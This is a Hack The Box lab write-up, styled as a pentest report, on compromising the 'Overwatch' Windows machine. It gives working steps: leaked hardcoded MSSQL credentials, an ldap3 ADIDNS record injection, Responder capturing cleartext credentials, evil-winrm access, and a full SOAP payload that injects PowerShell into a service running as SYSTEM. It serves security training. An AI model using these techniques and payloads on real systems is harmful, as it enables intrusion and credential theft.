HTB - Overwatch
.NET decompilation leaks hardcoded MSSQL creds and a command injection. ADIDNS poisoning redirects a linked server to a rogue MSSQL and captures cleartext credentials, then a WCF SOAP injection runs as SYSTEM.
Hack The Box — Overwatch
Hard | Windows Server 2022 | Hack The Box
| Field | Value |
|---|---|
| Report Date | 01 February 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.8.44 |
| Hostname | N/A |
| Domain | N/A |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Overwatch. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
.NET decompilation leaks hardcoded MSSQL creds and a command injection. ADIDNS poisoning redirects a linked server to a rogue MSSQL and captures cleartext credentials, then a WCF SOAP injection runs as SYSTEM.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.8.44 |
| Hostname | N/A |
| Domain | N/A |
| Operating System | Windows Server 2022 |
| Machine Rating | Hard |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 01 February 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Full port scan (-p-) — MSSQL on port 6520, SMB guest access | T1046 |
| Info Gathering | .NET decompilation (ilspycmd) → hardcoded creds + command injection vuln | T1083 · T1552.001 |
| Initial Access | ADIDNS poisoning → rogue MSSQL (Responder) → cleartext sqlmgmt creds → WinRM | T1557 · T1078 |
| Privilege Escalation | WCF SOAP KillProcess command injection → SYSTEM → root flag | T1059 · T1068 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
| Port | Service |
|---|---|
| 53 | DNS |
| 88 | Kerberos |
| 135, 139, 445 | RPC / SMB |
| 389, 636 | LDAP / LDAPS |
| 5985 | WinRM |
| 6520 | MSSQL (non-standard — full scan required) |
Guest access to the software$ SMB share exposes Monitoring/overwatch.exe and its DLLs.
Information Gathering
.NET Decompilation
overwatch.exe is a .NET WCF service. Decompiling with ilspycmd reveals:
// Hardcoded connection string
private readonly string connectionString =
"Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;";
// Command injection in KillProcess()
string scriptContents = "Stop-Process -Name " + processName + " -Force";
pipeline.Commands.AddScript(scriptContents);Credentials: sqlsvc:TI0LKcfHzZw1Vv
WCF service is bound to http://localhost:8000/MonitorService and runs as NT AUTHORITY\SYSTEM.
MSSQL & LDAP Enumeration
sqlsvc is db_owner on the overwatch database but not sysadmin. A linked server SQL07 is configured with rpc_out=True and no explicit login mapping — and SQL07 has no DNS record.
LDAP enumeration identifies sqlmgmt as a member of Remote Management Users (WinRM access).
Initial Access — ADIDNS Poisoning + Rogue MSSQL
Any authenticated domain user can create LDAP objects in the ADIDNS zone. Adding SQL07 → attacker IP causes the DC to resolve the linked server to the attacker machine.
# ldap3 — add DNS A record
dn = 'DC=SQL07,DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb'
conn.add(dn, attributes={'objectClass': ['top', 'dnsNode'], 'dnsRecord': record_data})With Responder listening on port 1433, triggering OPENQUERY(SQL07, 'SELECT 1') from the MSSQL session causes the DC to connect to the rogue server using SQL Authentication — TDS transmits credentials in cleartext.
sudo responder -I tun0 -v
# [MSSQL] Cleartext Username : sqlmgmt
# [MSSQL] Cleartext Password : bIhBbzMMnB82yxevil-winrm -i 10.129.8.44 -u sqlmgmt -p 'bIhBbzMMnB82yx'User flag: type C:\Users\sqlmgmt\Desktop\user.txt
Privilege Escalation — WCF SOAP Command Injection
Port 8000 listens under PID 4 (SYSTEM). The KillProcess SOAP method concatenates input directly into a PowerShell pipeline with no sanitisation. Injecting after a semicolon terminates the expected command and runs arbitrary code:
Input: test -Force; whoami | Out-File C:\Software\out.txt;#
Result: Stop-Process -Name test -Force; whoami | Out-File C:\Software\out.txt;# -Force$soapEnv = '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><KillProcess xmlns="http://tempuri.org/"><processName>test -Force; Get-Content C:\Users\Administrator\Desktop\root.txt | Out-File C:\Software\out.txt;#</processName></KillProcess></s:Body></s:Envelope>'
$headers = @{"SOAPAction" = "http://tempuri.org/IMonitoringService/KillProcess"}
Invoke-WebRequest -Uri "http://localhost:8000/MonitorService" -Method POST -ContentType "text/xml; charset=utf-8" -Headers $headers -Body $soapEnv -UseBasicParsingRoot flag: Get-Content C:\Software\out.txt
6. Proof of Access
| Level | Evidence |
|---|---|
| User | type C:\Users\sqlmgmt\Desktop\user.txt |
| Root | Get-Content C:\Software\out.txt |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| See Findings | Documented inline | Mixed | Commands and evidence blocks in section 5 |
8. Impact Assessment
Successful exploitation resulted in high-impact host compromise and demonstrated practical attacker control across the full kill chain for this target.
9. Remediation Summary
| Priority | Action |
|---|---|
| High | Patch exploitable service components and remove unsafe defaults. |
| High | Restrict writable paths and high-risk ACL/delegation rights. |
| Medium | Enforce credential hygiene, rotation, and secret exposure controls. |
| Medium | Add detections for attacker tradecraft used in section 5. |
10. Key Takeaways
- Small configuration weaknesses can chain into full host compromise.
- Credential exposure and trust relationships are critical escalation multipliers.
- Reproducible testing and evidence-driven reporting improve remediation quality.
11. Tools Used
| Tool | Purpose |
|---|---|
nmap | Used during enumeration/exploitation workflow. |
nxc | Used during enumeration/exploitation workflow. |
ilspycmd | Used during enumeration/exploitation workflow. |
responder | Used during enumeration/exploitation workflow. |
evil-winrm | Used during enumeration/exploitation workflow. |
ldap3 | Used during enumeration/exploitation workflow. |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Overwatch | RobInTheHood | 01 February 2026